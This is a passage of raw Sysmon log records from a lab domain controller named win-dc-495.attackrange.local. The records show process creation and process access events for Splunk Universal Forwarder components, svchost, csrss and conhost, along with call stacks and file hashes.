Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.029{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.152{59A5CD1D-939F-6005-DA04-00000000A301}36882632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program 